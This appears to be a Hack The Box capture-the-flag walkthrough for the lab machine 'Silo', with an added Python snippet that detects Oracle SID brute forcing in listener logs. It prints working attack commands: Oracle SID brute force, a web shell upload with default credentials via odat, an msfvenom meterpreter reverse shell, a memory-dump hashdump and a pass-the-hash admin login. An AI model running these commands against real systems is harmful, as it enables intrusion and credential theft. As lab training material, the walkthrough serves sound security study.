HTB: Silo

Enumeration

nmap

nmap -sV 10.10.10.82 -oA nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-08 07:28 EST
Nmap scan report for 10.10.10.82
Host is up (0.66s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

SID Enumeration

msf5 auxiliary(scanner/oracle/sid_brute) > set RHOSTS
RHOSTS =>
msf5 auxiliary(scanner/oracle/sid_brute) > run
Checking 571 SIDs against
Oracle - Checking 'LINUX8174'
Oracle - Checking 'ORACLE'
Oracle - Refused 'ORACLE'
[+] Oracle - 'XE' is valid
Oracle - Checking 'ASD8'
Oracle - Refused 'ASD8'
Oracle - Checking 'IASD8'
Oracle - Refused 'IASD8'
Caught interrupt from the console.
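
The detection side of the SID brute force above, as an added example that is not part of the original write-up: it counts distinct unknown-SID failures (TNS-12505) per client in the listener's text log and flags clients that cycle through many SIDs. The log layout, the sample lines, the client addresses and the threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample data (not from the page). Assumed text listener.log layout:
# timestamp * connect data * protocol info * event * SID * return code
CD = "(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=)(USER=)))"
AD = "(ADDRESS=(PROTOCOL=tcp)(HOST={host})(PORT={port}))"
ROWS = [  # (time, requested SID, client address, client port, return code)
    ("07:41:02", "LINUX8174", "192.0.2.10", 40112, 12505),
    ("07:41:02", "ORACLE", "192.0.2.10", 40113, 12505),
    ("07:41:03", "XE", "192.0.2.10", 40114, 0),
    ("07:41:03", "ASD8", "192.0.2.10", 40115, 12505),
    ("07:41:04", "IASD8", "192.0.2.10", 40116, 12505),
    ("07:45:10", "XEE", "192.0.2.50", 51200, 12505),  # one typo by a real client
    ("07:45:31", "XE", "192.0.2.50", 51201, 0),
]
SAMPLE_LOG = "\n".join(
    f"08-JAN-2020 {t} * {CD.format(sid=s)} * {AD.format(host=h, port=p)}"
    f" * establish * {s} * {c}"
    + ("\nTNS-12505: TNS:listener does not currently know of SID given" if c == 12505 else "")
    for t, s, h, p, c in ROWS
)

UNKNOWN_SID = 12505  # listener return code for a SID it does not serve


def parse_connect(line):
    """Return (client_host, sid, return_code) for an 'establish' entry, else None."""
    parts = line.strip().split(" * ")
    if len(parts) != 6 or parts[3] != "establish" or not parts[5].isdigit():
        return None  # error text lines, service_update entries, truncated lines
    host = re.search(r"\(HOST=([^)]+)\)", parts[2])
    return (host.group(1), parts[4], int(parts[5])) if host else None


def sid_guessing_sources(log_text, threshold=3):
    """Map each client to the distinct SIDs it failed on, if at least `threshold`."""
    failed = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_connect(line)
        if rec and rec[2] == UNKNOWN_SID:
            failed[rec[0]].add(rec[1].upper())
    return {h: sorted(s) for h, s in failed.items() if len(s) >= threshold}


if __name__ == "__main__":
    for host, sids in sid_guessing_sources(SAMPLE_LOG).items():
        print(f"possible SID enumeration from {host}: {len(sids)} unknown SIDs {sids}")
```

Counting distinct SIDs rather than raw failures keeps a single misconfigured client that retries one wrong SID from tripping the alert.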

Password Guesser – odat

Uploading aspx shell for command injection

./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /usr/share/webshells/aspx/cmdasp.aspx --sysdba

Reverse Shell

Or create msfvenom payload for reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > lisa.aspx

Upload the file

./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot\' 'lisa.aspx' /root/odat2.5/lisa.aspx --sysdba

Call the file for the reverse shell

curl http://10.10.10.82/lisa.aspx

Privilege Escalation

Download the file

In the dump, to find the valuable info, use Volatility (check the GitHub page)

Volatility

Suggested profiles:

python vol.py -f /root/Downloads/SILO-20180105-221806.dmp imageinfo

Sysinfo

python vol.py -f /root/Downloads/SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist

python vol.py -f /root/Downloads/SILO-20180105-221806.dmp --profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000 hashdump

Admin Shell – Pass the Hash

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe
